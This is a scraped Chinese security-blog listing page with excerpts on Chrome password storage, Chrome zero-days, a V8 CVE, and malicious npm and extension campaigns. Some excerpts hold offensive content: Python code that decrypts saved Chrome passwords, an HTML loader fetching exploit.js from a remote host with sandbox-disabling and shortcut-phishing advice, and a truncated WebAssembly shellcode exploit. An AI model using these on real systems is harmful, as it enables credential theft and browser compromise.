漏洞盒子自动提交脚本(白嫖) 安全开发

漏洞盒子自动提交脚本(白嫖)

高质量的安全文章,安全offer面试经验分享尽在 # 掌控安全EDU #作者:掌控安全-劲夫漏洞盒子自动提交脚本文件的大致作用如图前期的环境配置这一段是后面加的,压缩包里面多了一个librays.txt的文件在上图中是没有的,这里面存放的是使用脚本需要用到的python库,在使用前先用下面的命令安装一下需要的库pip install -r librays.txt然后配置一下selenium所需要的环境,打开chorme浏览器查看自己的chrome版本然后去下载seleniumdriver这个驱动,点击跳转,下载链接在里面找到和自己chrome浏览器对应的版本号,然后点进去(找不到一模一样的找相近的)windows系统下载这个32位的就好里面有一个chromedriver.exe文件,解压出来放到一个空文件夹下然后把这个文件的路径添加到path这个环境变量中,配置就结束了开始使用使用提交文件的第一件事就是需要修改config.yaml文件中的配置信息,需要修改的点上面有会有**作为标记,里面的注释也提示的很详细1.第一个修改点,漏洞盒子的登录账号和密下面要修改的内容都是content下的内容1.漏洞标题的前后缀,例如说你想写某某站点存在SQL注入,那么你只需要在这里写SQL注入就好了2.type2是你要提交的漏洞类型,在define的内容中有对照支持提交的类型,目前只有SQL注入,任意文件操作,弱口令3.修改漏洞简述和修复方案,如果内容很长的话可以换行写,自己在内容后面加上n,不然填写的时候,他们都是连在一起的配置结束打开bugs.xlsx文件填写要提交的漏洞信息1.字段的含义如下,如果说你提交的漏洞类型不需要某列的数据,那么你不填也行2.这里poc的话如果要填http请求包,直接bp抓包然后复制放进去就好了3.复现步骤里面呢是用@来进行分行的,如果说要上传图片的话,那么就需要填写图片的在本机上的绝对路径,并且独占一行,也就是如下面这样,可以现在记事本里面分行也好,然后在删成一行填进去这里存在漏洞,@D:/[email protected]如果是刚开电脑第一次交洞,那么先自己打开浏览器交一次(不需要真的提交),就是要点一下提交漏洞,因为他会有个答题的弹框,第一次答完再去启动脚本poc的修改(不会写poc的不用看)关于这个脚本我是想简化大家写poc时一些步骤,所以才给出来的,如果说有小伙伴可以写出自动验证,并且配合这个提交脚本xlsx文件的,那么自己写也行1.这里要修改的就是poc和exp这两个方法,poc负责验证漏洞存在,exp负责验证可以利用,并且填写漏洞信息到excel中,如果说你要验证的这个漏洞只需要验证存在就可以提交,那么写好poc就OK了,exp中就修改提交的内容格式就好了2.poc 文件返回的是布尔值,存在就返回true否则false3.exp的话截图不是太清楚,直接去看源代码吧,我把注释进行了补充附件:后台回复“0357”申明:本公众号所分享内容仅用于技术讨论,切勿用于违法途径,违者必究,后果需自行承担,与本公众号及作者无关回顾往期内容Xray挂机刷漏洞如何培养一名合格的“黑客”零基础学黑客,自学路线与误区POC批量验证Python脚本编写实战纪实 | SQL漏洞实战挖掘技巧渗透工具 | 红队常用的那些工具分享    代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!扫码白嫖视频+工具+进群+靶场等资料  扫码白嫖! 原文始发于微信公众号(掌控安全EDU):漏洞盒子自动提交脚本(白嫖)
阅读全文
网络安全自学篇(二)| Chrome浏览器保留密码功能渗透解析及登录加密入门笔记 安全闲碎

网络安全自学篇(二)| Chrome浏览器保留密码功能渗透解析及登录加密入门笔记

作者介绍:杨秀璋_自幼受贵州大山的熏陶,养成了诚实质朴的性格。经过寒窗苦读,考入BIT,为完成自己的教师梦,放弃IT、航天等工作,成为贵财一名大学教师,并想把自己所学所感真心传授给自己的学生,帮助更多陌生人。__一.用户登录明文与加密浅析_浏览器开发模式通常可以查看源代码,以简书为例,在 登录页面 输入用户名和密码,然后右键“检查”或“审查元素”。运行结果如下所示,点击“Network”选择页面能查看消息头Headers及状态信息、Cookies或Sessions。这是开发者常用的分析方法,尤其是网络爬虫,需要审查元素定位所需信息的HTML源码。下图展示了作者输入的用户名及密码,这里的密码是明文显示的。而有的网站输入的用密码是加密过的,比如我大贵财某登陆系统传递的密码是MD5加密。MD5解密如下所示。作者写这部分原因:一是想讲解下浏览器开发者模式的基本用法,二是后续想了解网站前端是否需要加密,用户名和密码传递到后台程序是如何加密解密的,以及存储至数据库的基本流程、它是明文或密文,这是否存在安全隐患及预防措施等。MD5即Message-Digest Algorithm 5(信息-摘要算法第5版),是计算机安全领域广泛使用的一种散列函数,用以提供消息的完整性保护,确保信息传输完整一致。MD5是计算机广泛使用的杂凑算法之一(又译摘要算法、哈希算法),主流编程语言普遍已有MD5实现。注意,任意长度的数据,算出的MD5值长度都是固定的;对原数据进行任何改动,哪怕只修改1个字节,所得到的MD5值都有很大区别。MD5的作用是让大容量信息在用数字签名软件签署私人密钥前被"压缩"成一种保密的格式(就是把一个任意长度的字节串变换成一定长的十六进制数字串)。MD5理论上还是安全的,毕竟号称是不可逆算法。但是,目前网上有一些神器撞库网站,把所有密码列举出来,然后去比对的暴力破解法,虽然笨重,但是也很有效。_二.浏览器保留密码功能漏洞示例_漏洞测试1浏览器本机保留密码功能是非常不安全的,不推荐大家使用,不过如果你想找回密码用这种方式倒是不错。 首先,在需要登录的页面上选择浏览器自动保留用户名和密码,并提交登录。接着,退出重新登录,Chrome浏览器审查元素,定位密码位置。最后,将输入框input元素的type属性,从“password”修改为“text”,显示结果如下所示。所以,大家在登陆网站时尽量不要选择保存用户名和密码,该行为带来了极大的密码泄露风向,而且很难规避,尤其是重要的密码或超级管理员账户。除非增加手机验证码、异常登录提醒、QQ验证等。个人建议: 电脑不用轻易借给他人使用,除非身边非常信任的人非私人电脑一定不能让浏览器保存密码设定一些易于记住的密码,浏览器里登录时重要账户选择不要保存密码,每次登录手动输入离开电脑务必记得随时锁屏或者关机,登录系统一定要设定密码整合到Chrome第三方工具如LastPass,使用主密码来管理那些密码_2.常用工具那么,Chrome浏览器是如何存储这些用户名和密码呢?它是否也不安全呢? 首先,打开密码管理器。设置->高级->密码,或者输入 chrome://settings/passwords。接着,查看保留的用户名和密码,包括163邮箱、百度等。不会吧,这么危险。所幸,Chrome浏览器对显示的密码进行了一道验证,需要输入正确的电脑账户密码才能查看,如下图所示。为了执行加密(在Windows操作系统上),Chrome使用了Windows提供的API,该API只允许用于加密密码的Windows用户账户去解密已加密的数据。所以基本上来说,你的主密码就是你的Windows账户密码。所以,只要你登录了用自己的账号Windows,Chrome就可以解密加密数据。输出Windows账户正确显示对应网站的密码。补充知识: 由于Windows账户密码是一个常量,并不是只有Chrome才能读取“主密码”,其他外部工具也能获取加密数据,同样也可以解密加密数据。比如使用NirSoft的免费工具ChromePass(NirSoft官方下载) ,就可以看得你已保存的密码数据,并可以轻松导出为文本文件。既然ChromePass可以读取加密的密码数据,那恶意软件也能读取的。当ChromePass.exe被上传至VirusTotal 时,超过半数的反病毒(AV)引擎会标记这一行为是危险级别。不过微软的Security Essentials并没有把这一行为标记为危险。假设你的电脑被盗,小偷重设了Windows账号密码。如果他们随后尝试在Chrome中查看你的密码,或用ChromePass来查看,密码数据都是不可用。原因很简单,因为“主密码”并不匹配,所以解密失败。此外,如果有人把那个SQLite数据库文件复制走了,并尝试在另外一台电脑上打开,ChromePass也将显示空密码,原因同上。结论是Chrome浏览器中已保存密码的安全性,完全取决于用户本身 。个人建议:使用一个极高强度的Windows账号密码。必须记住,有不少工具可以解密Windows账号密码。如果有人获取了你的Windows账号密码,那他也就可以知道你在Chrome已保存的密码。远离各种各样的恶意软件。如果工具可以轻易获取你已保存的密码,那恶意软件和那些伪安全软件同样可以做到。如果非得下载软件,请到软件官方网站去下载。把密码保存至密码管理软件中(如KeePass),或使用可以整合到Chrome中的第三方工具(如LastPass),使用主密码来管理你的那些密码。用工具(如TrueCrypt)完全加密整个硬盘,并且非私人电脑一定不能让浏览器保存密码。_漏洞测试3作者想继续修改input密码的属性,看看能不能显示密码。如下图所示:再次幸运,Chrome应该已经解决了该漏洞,显示空白。接着,作者尝试获取本地Chrome浏览器登录的账户信息。找到密码存储的位置,文件或者是注册表,这个时候需要开启监控工具,打开注册表和文件操作信息。然后到chrome密码管理界面,随便删除一条记录,然后看看chrome本身对哪些文件或者注册表进行了修改。也可以直接寻找文件,通常用户名文件的存储路径为: C:Users…AppDataLocalGoogleChromeUser DataDefault  找到下图所示的文件,Login Data。_漏洞测试4接着打开这个文件,还好这个文件是加密的,而不是明文存储。虽然该文件加密了,但是可以看到它是 SQLite format 3 的格式。接着通过工具读取该数据。这里使用 Navicat Premium工具。Navicat premium是一款数据库管理工具,是一个可多重连线资料库的管理工具,它可以让你以单一程式同时连线到 MySQL、SQLite、Oracle 及 PostgreSQL 资料库,让管理不同类型的资料库更加的方便。第一步,新建连接。第二步,输入连接名如“test0803”,并导入本地的“Login Data”数据。第三步,打开之后在“main”数据库中包含了三张表,其中logins为登录表。第四步,打开如下所示,比如163邮箱的用户名为我的电话,密码是加密的。第五步,破解思想。想要破解一个加密算法是很难的。这学习TK13大神的文章,了解到Chrome开源的加密函数CryptProtectData和CryptUnprotectData。这对加解密函数非常特别,调用的时候会去验证本地登录身份,这也就是为什么别人的那个密码文档不能直接拷贝到我们自己chrome相关文件夹下去看的原因了。接下来是代码实现,找到开源的Sqllite3库,把数据库解析出来,然后得到密码的加密数据,用CryptUnprotectData解密。注意,如果chrome开启的时候直接对这个数据库文件操作会失败,建议每次操作先把文件拷贝出来再处理。 参考文章: https://www.secpulse.com/archives/3351.html http://netsecurity.51cto.com/art/201603/507131.htm https://blog.csdn.net/u013761036/article/details/53822036第六步,使用TK13大神分享的AnalysisChromeLogin.exe工具进行解密。下载地址:http://download.csdn.net/detail/u013761036/9719029PS:是不是很可怕,所以个人电脑大家一定要保护好开机密码,别轻易让坏人使用。后续尝试破壳看看这个EXE程序源代码是如何解析的。_三.Chrome浏览器密码存储机制_下面分享N1ckw0rm大神讲解的Chrome浏览器密码存储机制。谷歌浏览器加密后的密钥存储于%APPDATA%…LocalGoogleChromeUser DataDefaultLogin Data”下的一个SQLite数据库中。那么他是如何加密的呢,通过开源的Chromium,我们来一探究竟:首先,我们作为用户登录一个网站时,会在表单提交Username以及Password相应的值,Chrome会首先判断此次登录是否是一次成功的登录,部分判断代码如下:Provisional_save_manager_->SubmitPassed(); if (provisional_save_manager_->HasGeneratedPassword()) UMA_HISTOGRAM_COUNTS(“PasswordGeneration.Submitted”, 1); If (provisional_save_manager_->IsNewLogin() && !provisional_save_manager_->HasGeneratedPassword()){ Delegate_->AddSavePasswordInfoBarIfPermitted( Provisional_save_manager_.release()); } else { provisional_save_manager_->Save(); Provisional_save_manager_.reset(); }  当我们登录成功时,并且使用的是一套新的证书(也就是说是***次登录该网站),Chrome就会询问我们是否需要记住密码。 那么登录成功后,密码是如何被Chrome存储的呢?答案在EncryptedString函数,通过调用EncryptString16函数,代码如下:Bool Encrypt::EncryptString(const std::string& plaintext,std::string* ciphertext) { DATA_BLOB input; Input.pbData = static_cast<DWORD>(plaintext.length()); DATA_BLOB output; BOOL result = CryptProtectData(&input, L””,NULL, NULL, NULL, 0,&output); if (!result) Return false; //复制操作 Ciphertext->assign(reinterpret_cast<std::string::value_type*>(output.pbData); LocalFree(output.pbData); Return true; }  代码利用了Widows API函数CryptProtectData(前面提到过)来加密。当我们拥有证书时,密码就会被回复给我们使用。在我们得到服务器权限后,证书的问题已经不用考虑了,所以接下来就可以获得这些密码。下面通过Python代码实现从环境变量中读取Login Data文件的数据,再获取用户名和密码,并将接收的结果通过win32crypt.CryptUnprotectData解密密码。google_path = r’ GoogleChromeUser DataDefaultLogin Data’ file_path = os.path.join(os.environ,google_path) #Login Data文件可以利用python中的sqlite3库来操作。conn = sqlite3.connect(file_path) for row in conn.execute('select username_value, password_value, signon_realm from logins'): #利用Win32crpt.CryptUnprotectData来对通过加密的密码进行解密操作。 cursor...
阅读全文
【技术分析】PuzzleMaker 使用 Chrome 零日漏洞利用链进行攻击 安全文章

【技术分析】PuzzleMaker 使用 Chrome 零日漏洞利用链进行攻击

点击上方蓝字“Ots安全”一起玩耍      -点击图文广告 = 打赏作者:科斯汀·赖乌   鲍里斯·拉林    阿列克谢·库拉耶夫2021 年 4 月 14 日至 15 日,卡巴斯基技术检测到一波针对多家公司的高度针对性攻击。更仔细的分析表明,所有这些攻击都利用了一系列 Google Chrome 和 Microsoft Windows 零日漏洞。虽然我们无法在 Chrome 网络浏览器中检索用于远程代码执行 (RCE) 的漏洞,但我们能够找到并分析用于逃离沙箱并获取系统权限的特权提升 (EoP) 漏洞。特权提升漏洞经过了微调,以针对 Windows 10 的最新和最突出的版本(17763 – RS5、18362 – 19H1、18363 – 19H2、19041 – 20H1、19042 – 20H2),并且它利用了两个不同的漏洞Microsoft Windows 操作系统内核。2021 年 4 月 20 日,我们向 Microsoft 报告了这些漏洞,他们将 CVE-2021-31955 分配给信息泄露漏洞,将 CVE-2021-31956 分配给提权漏洞。作为 6 月补丁星期二的一部分,这两个漏洞均于 2021 年 6 月 8 日修复。远程代码执行漏洞利用所有观察到的攻击都是通过 Chrome 浏览器进行的。不幸的是,我们无法检索到带有完整漏洞利用代码的 JavaScript,但攻击和事件发生的时间框架让我们怀疑存在一个特定漏洞。Pwn2Own 比赛于 2021 年 4 月 6 日至 8 日举行。这是一场计算机黑客大赛,其中 Google Chrome 网络浏览器是目标之一。根据 ZDI(零日倡议,Pwn2Own 的组织者)网站,一个参与团队能够使用 Typer Mismatch 错误证明对 Chrome 渲染器进程的成功利用。2021 年 4 月 12 日,Chromium 的开发人员向 V8 的开源存储库(Chrome 和 Chromium 网络浏览器使用的 JavaScript 引擎)提交了两个(问题1196683和1195777)与 Typer 相关的错误修复。这些错误修复之一(问题1196683)旨在修补 Pwn2Own 期间使用的漏洞,并且这两个错误修复与回归测试一起提交 - JavaScript...
阅读全文
Google修复今年第8个 Chrome 0day;Kaspersky发布APT Ferocious Kitten的报告 安全漏洞

Google修复今年第8个 Chrome 0day;Kaspersky发布APT Ferocious Kitten的报告

维他命安全简讯19星期六2021年06月【威胁情报】Google修复今年第8个已被在野利用的Chrome 0dayhttps://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html【分析报告】Kaspersky发布APT团伙Ferocious Kitten的分析报告https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/【数据泄露】Cosmolog Kozmetik因AWS S3配置错误泄露客户信息https://www.infosecurity-magazine.com/news/aws-misconfiguration-exposes/英国甜品连锁店Cake Box称其网站遭到MageCart攻击https://www.bleepingcomputer.com/news/security/eggfree-cake-box-suffer-data-breach-exposing-credit-card-numbers/黑客在暗网出售超过500万条奥迪和大众车主的信息https://www.bleepingcomputer.com/news/security/audi-volkswagen-customer-data-being-sold-on-a-hacking-forum/声明:本资讯由启明星辰维他命安全小组翻译和整理 本文始发于微信公众号(维他命安全):Google修复今年第8个 Chrome 0day;Kaspersky发布APT Ferocious Kitten的报告
阅读全文
【技术干货】Chrome-V8-CVE-2018-17463 安全漏洞

【技术干货】Chrome-V8-CVE-2018-17463

这是在A guided tour through Chrome's javascript compiler上的几个cve之一,为了学习v8的相关研究,将这三者一个一个攻破,下面是对应的commit。环境搭建用v8 action,用法参考👇工欲善其事:Github Action 极简搭建 v8 环境cd v8tools/dev/v8gen.py x64.debugninja -C out.gn/x64.debug d8tools/dev/v8gen.py x64.releaseninja -C out.gn/x64.release d8cd ..漏洞分析看下diffdiff --git a/src/compiler/js-operator.cc b/src/compiler/js-operator.ccindex 94b018c..5ed3f74 100644--- a/src/compiler/js-operator.cc+++ b/src/compiler/[email protected]@ -622,7 +622,7 @@ V(CreateKeyValueArray, Operator::kEliminatable, 2, 1) V(CreatePromise, Operator::kEliminatable, 0, 1) V(CreateTypedArray, Operator::kNoProperties, 5, 1) - V(CreateObject, Operator::kNoWrite, 1, 1) + V(CreateObject, Operator::kNoProperties, 1, 1) V(ObjectIsArray, Operator::kNoProperties, 1, 1) V(HasProperty, Operator::kNoProperties, 2, 1) V(HasInPrototypeChain, Operator::kNoProperties, 2, 1) 显然是kNoWrite引起的错误,我们看看这是什么意思,以下来自👇https://docs.google.com/presentation/d/1DJcWByz11jLoQyNhmOvkZSrkgcVhllIlCHmal1tGzaw/edit#slide=id.g52a72d9904_2_100//From src/compiler/operator.h:kNoWrite = 1 << 4, // Does not modify any Effects and thereby // create new scheduling dependencies.But: Object.create(o) does have a side effect: 1. It changes the map of o 2. Properties...
阅读全文
【全球资讯】NPM 包通过 Chrome 的帐户恢复工具窃取密码 安全新闻

【全球资讯】NPM 包通过 Chrome 的帐户恢复工具窃取密码

点击上方蓝字“Ots安全”一起玩耍在另一场大规模的软件供应链攻击中,密码窃取者通过 ChromePass 从 Windows 系统上的 Chrome 窃取凭据。在 npm 开源代码库中发现了一个使用合法密码恢复工具的凭据窃取代码炸弹,它潜伏在 npm 开源代码存储库中,等待植入从该源提取代码的庞大应用程序群中。研究人员从 Windows 系统上的 Chrome 中捕获了恶意软件窃取凭据。密码窃取器是多功能的:它还可以侦听来自攻击者的命令和控制 (C2) 服务器的传入命令,可以上传文件、从受害者的屏幕和摄像头进行记录以及执行 shell 命令。npm(最初是 Node Package Manager 或 NPM 的缩写)是 JavaScript 运行时环境 Node.js 的默认包管理器,Node.js 建立在 Chrome 的 V8 JavaScript 引擎之上。它类似于 GitHub、RubyGems 和 PyPI 等其他代码存储库,因为它是(非常长的)软件供应链的一部分。用“庞大”来描述生态系统是一种轻描淡写的说法:npm 托管着超过 150 万个独特的包,每天为全球约 1100 万开发人员提供超过 10 亿次 JavaScript 包请求。滥用 Google ChromePass 实用程序除了文本 JavaScript 文件,npm 还包含各种类型的可执行文件,例如 PE、ELF 和 Mach-O。ReversingLabs 研究人员在周三的一篇文章中发表了他们的发现,他们表示,在对代码存储库进行分析期间,他们发现了一个有趣的嵌入式 Windows 可执行文件:凭据窃取威胁。标记为“Win32.Infostealer.Heuristics”,它出现在两个包中:nodejs_net_server 和 temptesttempfile。至少就目前而言,第一个主要威胁是 nodejs_net_server。一些细节:nodejs_net_server:自 2019 年 2 月首次发布以来,已发布 12 个版本,总共下载超过 1,300 次的包。它最后一次更新是在六个月前,由某人使用“chrunlee”的名字创作。根据 ReversingLabs 的说法,chrunlee 似乎也是 GitHub 上的活跃开发人员,该开发人员正在开发 61 个存储库。nodejs_net_server NPM 包摘要。资料来源:ReversingLabs。chrunlee 的 github 个人资料。资料来源:ReversingLabs。通过静态分析,研究人员在 nodejs_net_server 包的多个版本中发现了 Win32.Infostealer.Heuristics 文件。它的元数据显示该文件的原始名称是“a.exe”并且它位于“lib”文件夹内。研究人员指出,带有类似扩展名的单字母文件名会向威胁猎人发出危险信号。果然,a.exe 原来是一个名为 ChromePass 的实用程序:一个合法的工具,用于恢复存储在 Chrome 网络浏览器中的密码。chrunlee 通过 12 个版本增强了 nodejs_net_server 包,直到去年 12 月最终使用脚本对其进行升级以下载密码窃取程序,开发人员将其托管在个人网站上。研究人员推测,它随后被调整为运行 TeamViewer.exe,“可能是因为作者不希望恶意软件与其网站之间存在如此明显的联系”。分析师称,chrunlee...
阅读全文
Chrome 0day trick && Poc 安全漏洞

Chrome 0day trick && Poc

点击蓝字·关注我们直接上干货Chrome 0day Poc,可弹计算器P.S.看到Poc就懂原理了,算是个小trickEND免责声明本公众号内的文章及工具仅提供学习用途,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。今日关注福利发表于1小时前cckuailong查看:12340回复:7767回复 “chrome0day”,获取 poc下载地址好文分享收藏赞一下最美点在看哦 原文始发于微信公众号(我不是Hacker):Chrome 0day trick && Poc
阅读全文
Chrome的广告屏蔽插件,竟成了广告注入的“帮凶” 安全新闻

Chrome的广告屏蔽插件,竟成了广告注入的“帮凶”

更多全球网络安全资讯尽在邑安全据security affairs消息,Imperva安全研究人员发现Chrome浏览器上的某个广告屏蔽插件被攻击者滥用,并借此在谷歌搜索页面上注入恶意/虚假的广告。这是一个借助广告注入的诈骗性攻击行为,专门针对一些大型网站。该攻击通过利用一个名为AllBlock的广告屏蔽插件来实现,插件广泛用于Chrome和Opera浏览器上,这意味着攻击者已经可以在Chrome和Opera浏览器上注入恶意广告。广告注入是将未经授权/不安全的广告插入到网页中,并诱惑用户点击。目前这种恶意广告注入可以通过多种方式实现,包括使用恶意浏览器拓展,恶意软件和跨站脚本(XSS)攻击。2021年8月底,安全研究人员发现了一系列的广告分发、注入脚本的流氓域,攻击者们将其链接到了一个名为AllBlock拓展插件上。根据Imperva的分析报告,其中之一是hxxps://frgtylik.com/KryhsIvSaUnQ.js,工作方式如下:脚本会把当前页面中所有的链接列表,包括页面完整的URL,发送至远程服务器中;远程服务器会返回想要重新定向到脚本的域列表;当用户点击这些已经被更改的链接时,就会被劫持到其他的页面。具体过程如下图所示:简单来说,JavaScript代码将会被注入到浏览器打开的每一个新页面中,它会识别并将Web页面中的所有链接(即搜索引擎中的查询结果)发送到远程服务器。这时服务器会返回来一个恶意的域列表,以此替代原有合法的链接,这样当用户点击其中一个链接时,就会被定向到攻击者的恶意网站中。Imperva安全人员继续分析后表示,“在一个名为e.hiddenHref的变量中,恶意的JavaScript会利用服务器ratdsnet返回的信息替换掉原有的URL。只要用户点击了网页上任何修改过的链接,他就会被定向到另一个链接中。凭借着这个欺诈性的广告注入攻击中,每当用户出现注册或购买产品等特定的行为时,攻击者就可以从中获取利润。为此,攻击者使用了几种技术来规避AllBlock的检测,伴随的还有一些增加分析工作难度的操作,例如每100ms清除一次调试控制台,以及排除主要的搜索引擎等。Imperva安全研究人员还发现,该攻击行为可以和此前一个名为PBot活动联系起来,因为他们使用了相同的域名和IP地址。“广告注入是一种不断演变的威胁,几乎可以影响到所有的网站。当一个网站被广告注入时,网站的性能和用户体验会马上下降,这意味着网站的速度会降低,用户等待的时间也会更长。根据Baymard的研究报告,68.8%购物车会被用户舍弃,其中有很多原因,但不可否认的是,广告注入是其中最关键的原因之一。”“此外,广告注入还会给网站带来其他的影响,包括用户的信任度和忠诚度下降,网站收入也会因此下降,内容会被屏蔽,转换率也会降低。”值得庆幸的是,目前恶意的Ad-Blocking Chrome插件已经从WebStore和 Opera插件市场中删除,避免更多的人因此而遭受损失。原文来自: freebuf.com原文链接: https://securityaffairs.co/wordpress/123488/cyber-crime/ad-blocking-chrome-extension-allblock.html欢迎收藏并分享朋友圈,让五邑人网络更安全欢迎扫描关注我们,及时了解最新安全动态、学习最潮流的安全姿势!推荐文章1新永恒之蓝?微软SMBv3高危漏洞(CVE-2020-0796)分析复现2重大漏洞预警:ubuntu最新版本存在本地提权漏洞(已有EXP)  原文始发于微信公众号(邑安全):Chrome的广告屏蔽插件,竟成了广告注入的“帮凶”
阅读全文
实战Windows Chrome 0day 安全文章

实战Windows Chrome 0day

欢迎关注公众号:进德修业行道。一名普通的白帽子,维护着一个既讲技术又有温度的原创号,一如既往地学习和分享,希望大家在紧张而忙碌的生活中可以在这里安静的学习,前行的道路上感谢有您的关注与支持。0x01、漏洞复现实战Windows Chrome 0day需要满足的条件第一点是关闭沙箱环境第一种方式设置Chrome浏览器的快捷方式在快捷方式上增加  -no-sandbox第二种方式命令行命令Chrome.exe -no-sandbox如下第二点是构造payloadexp.html文件<script src="http://x.x.x.x/exploit.js"></script>exp.js文件放在自己的公网服务器上https://github.com/r4j0x00/exploits/tree/master/chrome-0day漏洞证明利用方法就是可以通过替换快捷方式来进行钓鱼0x02、写在最后免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。转载声明:进德修业行道 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 本文始发于微信公众号(进德修业行道):实战Windows Chrome 0day
阅读全文
【复现】Chrome三天内的第二枚0Day(结合其他漏洞可绕沙箱) 安全文章

【复现】Chrome三天内的第二枚0Day(结合其他漏洞可绕沙箱)

漏洞描述Google Chrome是由Google开发的免费网页浏览器。经测试,此0day漏洞影响 Chrome 最新正式版(90.0.4430.72)以及基于Chromium内核的Microsoft Edge正式版(89.0.774.77)以下。攻击者可通过构造特制web页面并诱导受害者访问来利用此漏洞获得远程代码执行。影响范围Google Chrome <= 90.0.4430.72基于Chromium内核的Microsoft Edge <= 89.0.774.77其他基于V8引擎的浏览器poc链接:https://github.com/avboy1337/1195777-chrome0day操作步骤cmd中执行如下命令,然后打开html文件即可"C:Program Files (x86)GoogleChromeApplicationchrome.exe" -no-sandbox注:这里是默认安装路径复现演示 修复建议目前Google暂未修复该漏洞,该漏洞仍为0day状态。建议用户谨慎点击可疑URL,谨慎处理可疑电子邮件及附件。特别是在攻防演练贴近实战的场景,攻击者利用该漏洞很可能攻陷防守方系统。条件允许尽量使用火狐浏览器网络传言结合其他漏洞可绕过浏览器沙箱限制,利用方法暂未公开,但提醒广大用户依然要注意防范参考链接:https://mp.weixin.qq.com/s/gVBsX62O3qaF4JxLsIGI5Qhttps://mp.weixin.qq.com/s/G-ffg_TDRkvcwM4tug8ZlAhttps://baijiahao.baidu.com/s?id=1696991925498875795&wfr=spider&for=pc欢迎关注公众号,原创不易,转载请注明来源【爱国小白帽】😘点个赞,证明你还爱我👇👇👇👇点击阅读原文查看第一枚0day 本文始发于微信公众号(爱国小白帽):【复现】Chrome三天内的第二枚0Day(结合其他漏洞可绕沙箱)
阅读全文
Cobalt Strike  利用 Chrome 0day 上线 安全文章

Cobalt Strike 利用 Chrome 0day 上线

POC (弹记事本的): <script>    function gc() {        for (var i = 0; i < 0x80000; ++i) {            var a = new ArrayBuffer();       }   }    let shellcode = ;    var wasmCode = new Uint8Array();    var wasmModule = new WebAssembly.Module(wasmCode);    var wasmInstance = new WebAssembly.Instance(wasmModule);    var main = wasmInstance.exports.main;    var bf = new ArrayBuffer(8);    var bfView = new DataView(bf);    function fLow(f) {        bfView.setFloat64(0, f, true);        return (bfView.getUint32(0, true));   }    function fHi(f) {    ...
阅读全文